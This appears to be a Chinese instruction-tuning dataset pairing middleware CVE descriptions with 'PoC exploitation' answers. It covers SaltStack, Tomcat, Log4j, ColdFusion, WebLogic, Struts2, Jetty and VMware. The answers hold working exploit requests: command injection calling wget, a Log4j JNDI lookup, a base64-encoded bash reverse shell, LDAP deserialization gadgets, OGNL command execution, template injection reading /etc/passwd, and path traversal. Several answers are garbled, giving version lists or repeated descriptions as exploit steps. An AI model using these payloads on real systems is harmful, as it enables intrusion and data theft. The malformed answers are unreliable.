  205. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592\n漏洞描述:2020年11月4日,SaltStack 官方发布了一则安全更新公告,其中CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令。CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。salt-api虽不是默认开启配置,但绝大多数SaltStack用户会选择开启salt-api,故存在较高风险。 参考阅读: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag\n影响版本:``` SaltStack Version 3002 SaltStack Version 3001.1, 3001.2 SaltStack Version 3000.3, 3000.4 SaltStack Version 2019.2.5, 2019.2.6 SaltStack Version 2018.3.5 SaltStack Version 2017.7.4, 2017.7.8 SaltStack Version 2016.11.3, 2016.11.6,2016.11.10 SaltStack Version 2016.3.4, 2016.3.6,2016.3.8 SaltStack Version 2015.8.10, 2015.8.13 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-16846\n【POC利用方法】\n1. SaltStack Version 3002\nSaltStack Version 3001.1, 3001.2\nSaltStack Version 3000.3, 3000.4\nSaltStack Version 2019.2.5, 2019.2.6\nSaltStack Version 2018.3.5\nSaltStack Version 2017.7.4, 2017.7.8\nSaltStack Version 2016.11.3, 2016.11.6,2016.11.10\nSaltStack Version 2016.3.4, 2016.3.6,2016.3.8\nSaltStack Version 2015.8.10, 2015.8.13\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/saltstack/CVE-2020-16846\ndocker-compose up -d\n3. POST /run HTTP/1.1\nHost: 127.0.0.1:8000\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: application/x-yaml\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 109\n\ntoken=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|wget http://xxx.dnslog.cn\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592.md"}
    206. 

  206. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat PUT方法任意写文件漏洞 CVE-2017-12615\n漏洞描述:参考: - http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html - https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 - https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: ``` <servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>listings</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>readonly</param-name> <param-value>false</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> ``` 虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。\n影响版本:``` Apache Tomcat 7.0.0-7.0.81(默认配置) ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12615\n【POC利用方法】\n1. <servlet>\n    <servlet-name>default</servlet-name>\n    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>\n    <init-param>\n        <param-name>debug</param-name>\n        <param-value>0</param-value>\n    </init-param>\n    <init-param>\n        <param-name>listings</param-name>\n        <param-value>false</param-value>\n    </init-param>\n    <init-param>\n        <param-name>readonly</param-name>\n        <param-value>false</param-value>\n    </init-param>\n    <load-on-startup>1</load-on-startup>\n</servlet>\n2. Apache Tomcat 7.0.0-7.0.81(默认配置)\n3. docker-compose build\ndocker-compose up -d\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat PUT方法任意写文件漏洞 CVE-2017-12615.md"}
    207. 

  207. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Log4j2 lookup JNDI 注入漏洞 CVE-2021-44228\n漏洞描述:Apache Log4j2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。 CVE-2021-44228常被称为`log4shell`。 参考链接: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://xz.aliyun.com/t/10649 Payloads: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Log4Shell.md\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-44228\n【POC利用方法】\n1. docker-compose up -d\n2. GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1\nHost: your-ip:8983\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\nConnection: close\n3. bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYxCgo=}|{base64,-d}|{bash,-i}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Log4j2 lookup JNDI 注入漏洞 CVE-2021-44228.md"}
    208. 

  208. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion XML 反序列化命令执行漏洞 CVE-2023-29300\n漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion在2018.0.16、2021.0.6、2023.0.0.330468版本及以前,存在一处XML反序列化漏洞。攻击者可以利用该漏洞调用Java中任意setter方法,最终执行任意命令。 参考链接: - [https://blog.projectdiscovery.io/adobe-coldfusion-rce/](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - [https://xz.aliyun.com/t/13413](https://xz.aliyun.com/t/13413)\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-29300\n【POC利用方法】\n1. docker compose up -d\n2. POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: your-vps-ip:8500\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 333\n\nargumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://192.168.24.1/HiJbyQaUgJ/CommonsBeanutils1/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL2F3ZXNvbWVfcG9jIn0=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>\n3. 要利用这个漏洞,需要先找到一个可利用的setter方法作为Gadget。最常见的Gadget是利用`com.sun.rowset.JdbcRowSetImpl`来进行JNDI注入,并执行任意命令。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Adobe ColdFusion XML 反序列化命令执行漏洞 CVE-2023-29300.md"}
    209. 

  209. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628\n漏洞描述:Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA - https://github.com/tdy218/ysoserial-cve-2018-2628\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-2628\n【POC利用方法】\n1. docker-compose up -d\n2. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\n3. python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628.md"}
    210. 

  210. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion 反序列化漏洞 CVE-2017-3066\n漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。 参考链接: - https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html - https://www.exploit-db.com/exploits/43993 - https://github.com/codewhitesec/ColdFusionPwn\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-3066\n【POC利用方法】\n1. docker-compose up -d\n2. java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/awesome_poc' poc.ser\n3. POST /flex2gateway/amf HTTP/1.1\nHost: your-ip:8500\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-amf\nContent-Length: 2853\n\n[...poc...]\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Adobe ColdFusion 反序列化漏洞 CVE-2017-3066.md"}
    211. 

  211. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978\n漏洞描述:VMware Spring Security是美国威睿(VMware)公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞,该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符(**.**)处理不受信任的输入时存在输入验证错误。 参考链接: - https://xz.aliyun.com/t/11473\n影响版本:``` Spring Security 5.5.x < 5.5.7 Spring Security 5.6.x < 5.6.4 Spring Security 其他低版本同样受影响 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-22978\n【POC利用方法】\n1. Spring Security 5.5.x < 5.5.7 \nSpring Security 5.6.x < 5.6.4 \nSpring Security 其他低版本同样受影响\n2. /admin/%0a%0d\n3. GET /admin/%0atest HTTP/1.1\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978.md"}
    212. 

  212. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 远程命令执行漏洞 CVE-2017-12629\n漏洞描述:漏洞原理与分析可以参考: - https://www.exploit-db.com/exploits/43009/ - https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:[XML实体扩展漏洞(XXE)](https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 本环境测试RCE漏洞。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12629\n【POC利用方法】\n1. docker-compose up -d\n2. POST /solr/demo/config HTTP/1.1\nHost: your-ip\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Length: 158\n\n{\"add-listener\":{\"event\":\"postCommit\",\"name\":\"new_listener\",\"class\":\"solr.RunExecutableListener\",\"exe\":\"sh\",\"dir\":\"/bin/\",\"args\":[\"-c\", \"touch /tmp/awesome_poc\"]}}\n3. POST /solr/demo/update HTTP/1.1\nHost: your-ip\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/json\nContent-Length: 15\n\n[{\"id\":\"test\"}]\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr 远程命令执行漏洞 CVE-2017-12629.md"}
    213. 

  213. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ Jolokia 后台远程代码执行漏洞 CVE-2022-41678\n漏洞描述:Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 在5.16.5, 5.17.3版本及以前,后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。 参考链接: - [https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt](https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt) - [https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/](https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/)\n影响版本:``` 5.16.0<=Apache ActiveMQ<5.16.6 5.17.0<=Apache ActiveMQ<5.17.4 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-41678\n【POC利用方法】\n1. 5.16.0<=Apache ActiveMQ<5.16.6\n5.17.0<=Apache ActiveMQ<5.17.4\n2. docker compose up -d\n3. GET /api/jolokia/list HTTP/1.1\nHost: your-ip:8161\nCache-Control: no-cache\nAuthorization: Basic YWRtaW46YWRtaW4=\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nOrigin: http://your-ip:8161\nConnection: close\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ Jolokia 后台远程代码执行漏洞 CVE-2022-41678.md"}
    214. 

  214. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr XML 实体注入漏洞 CVE-2017-12629\n漏洞描述:漏洞原理与分析可以参考: - https://www.exploit-db.com/exploits/43009/ - https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 本环境仅测试XXE漏洞,RCE和利用链,可以在 https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE 中查看。\n影响版本:``` Apache Solr < 7.1 Apache Lucene < 7. ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12629\n【POC利用方法】\n1. Apache Solr < 7.1\nApache Lucene < 7.\n2. docker-compose up -d\n3. http://your-ip:8983/solr/admin/cores\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr XML 实体注入漏洞 CVE-2017-12629.md"}
    215. 

  215. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933\n漏洞描述:2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。\n影响版本:``` Apache Shiro < 1.6.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13933\n【POC利用方法】\n1. Apache Shiro < 1.6.0\n2. 2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md"}
    216. 

  216. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954\n漏洞描述:VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过多因素身份验证、条件访问和单点登录,让您的员工更快地访问SaaS、Web和本机移动应用程序。其中的CVE-2022-22954是一个匿名服务器模板注入漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。\n影响版本:``` VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 ) VMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6) VMware Realize Automation (版本号:7.6) ```\n网络测绘:``` app=\"vmware-Workspace-ONE-Access\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-22954\n【POC利用方法】\n1. VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 )\nVMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6)\nVMware Realize Automation (版本号:7.6)\n2. app=\"vmware-Workspace-ONE-Access\"\n3. /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954.md"}
    217. 

  217. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-007 远程代码执行漏洞\n漏洞描述:参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 `<ActionName>-validation.xml` 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: ``` (...) public class UserAction extends ActionSupport { private Integer age; private String name; private String email; (...) ``` 然后配置有 UserAction-validation.xml: ``` <?xml version=\"1.0\" encoding=\"UTF-8\" ?> <!DOCTYPE validators PUBLIC \"-//OpenSymphony Group//XWork Validator 1.0//EN\" \"http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd\"> <validators> <field name=\"age\"> <field-validator type=\"int\"> <param name=\"min\">1</param> <param name=\"max\">150</param> </field-validator> </field> </validators> ``` 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 `\"'\" + value + \"'\"` 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 因为受影响版本为 Struts2 2.0.0 - Struts2 2.2.3,所以这里给出绕过安全配置进行命令执行的 Payload(**弹计算器,无法在本项目环境下运行**): ``` ' + (#_memberAccess[\"allowStaticMethodAccess\"]=true,#foo=new java.lang.Boolean(\"false\") ,#context[\"xwork.MethodAccessor.denyMethodExecution\"]=#foo,@java.lang.Runtime@getRuntime().exec(\"open /Applications/Calculator.app\")) + ' ``` 漏洞详情: - http://struts.apache.org/docs/s2-007.html\n影响版本:影响版本: 2.0.0 - 2.2.3\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. (...)\npublic class UserAction extends ActionSupport {\n    private Integer age;\n    private String name;\n    private String email;\n\n(...)\n2. <?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n<!DOCTYPE validators PUBLIC\n    \"-//OpenSymphony Group//XWork Validator 1.0//EN\"\n    \"http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd\">\n<validators>\n    <field name=\"age\">\n        <field-validator type=\"int\">\n            <param name=\"min\">1</param>\n            <param name=\"max\">150</param>\n        </field-validator>\n    </field>\n</validators>\n3. ' + (#_memberAccess[\"allowStaticMethodAccess\"]=true,#foo=new java.lang.Boolean(\"false\") ,#context[\"xwork.MethodAccessor.denyMethodExecution\"]=#foo,@java.lang.Runtime@getRuntime().exec(\"open /Applications/Calculator.app\")) + '\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-007 远程代码执行漏洞.md"}
    218. 

  218. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion 文件读取漏洞 CVE-2010-2861\n漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2010-2861\n【POC利用方法】\n1. docker-compose up -d\n2. 环境启动可能需要1~5分钟,启动后,访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。\n3. 直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Adobe ColdFusion 文件读取漏洞 CVE-2010-2861.md"}
    219. 

  219. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VoIPmonitor 远程命令执行漏洞 CVE-2021-30461\n漏洞描述:VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。 使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\n影响版本:``` VoIPmonitor < 24.60 ```\n网络测绘:``` \"VoIPmonitor\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-30461\n【POC利用方法】\n1. VoIPmonitor < 24.60\n2. \"VoIPmonitor\"\n3. $setConfigurationTypeValue_rslt = array();\nif(file_exists('config/configuration.php')) {\n\t$existsConfiguration = true;\n\tif(isset($_POST['recheck'])) {\n\t\tif(!empty($_POST['SPOOLDIR'])) {\n\t\t\tsetConfigurationTypeValue__index('SPOOLDIR', $_POST['SPOOLDIR']);\n\t\t}\n\t}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/VoIPmonitor 远程命令执行漏洞 CVE-2021-30461.md"}
    220. 

  220. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-001 远程代码执行漏洞\n漏洞描述:该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行. 参考阅读: -  http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. %{\"tomcatBinDir{\"+@java.lang.System@getProperty(\"user.dir\")+\"}\"}\n3. %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-001 远程代码执行漏洞.md"}
    221. 

  221. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-28164\n漏洞描述:Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。 Jetty 9.4.37引入对RFC3986的新实现,而URL编码的`.`字符被排除在URI规范之外,这个行为在RFC中是正确的,但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制,下载WEB-INF目录下的任意文件,导致敏感信息泄露。该漏洞在9.4.39中修复。 参考链接: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://xz.aliyun.com/t/10039\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-28164\n【POC利用方法】\n1. docker-compose up -d\n2. curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'\n3. curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-28164.md"}
    222. 

  222. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-005 远程代码执行漏洞\n漏洞描述:参考吴翰清的《白帽子讲Web安全》一书。 > s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\\u0023)或8进制(\\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上 XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如: ``` user.address.city=Bishkek&user['favoriteDrink']=kumys //会被转化成 action.getUser().getAddress().setCity(\"Bishkek\") action.getUser().setFavoriteDrink(\"kumys\") ``` 触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下: - S2-003 使用`\\u0023`绕过s2对`#`的防御 - S2-003 后官方增加了安全模式(沙盒) - S2-005 使用OGNL表达式将沙盒关闭,继续执行代码 漏洞详情: - http://struts.apache.org/docs/s2-005.html\n影响版本:影响版本: 2.0.0 - 2.1.8.1\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. user.address.city=Bishkek&user['favoriteDrink']=kumys \n//会被转化成\naction.getUser().getAddress().setCity(\"Bishkek\")  \naction.getUser().setFavoriteDrink(\"kumys\")\n2. docker-compose build\ndocker-compose up -d\n3. GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/awesome_poc%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1\nHost: target:8080\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-005 远程代码执行漏洞.md"}
    223. 

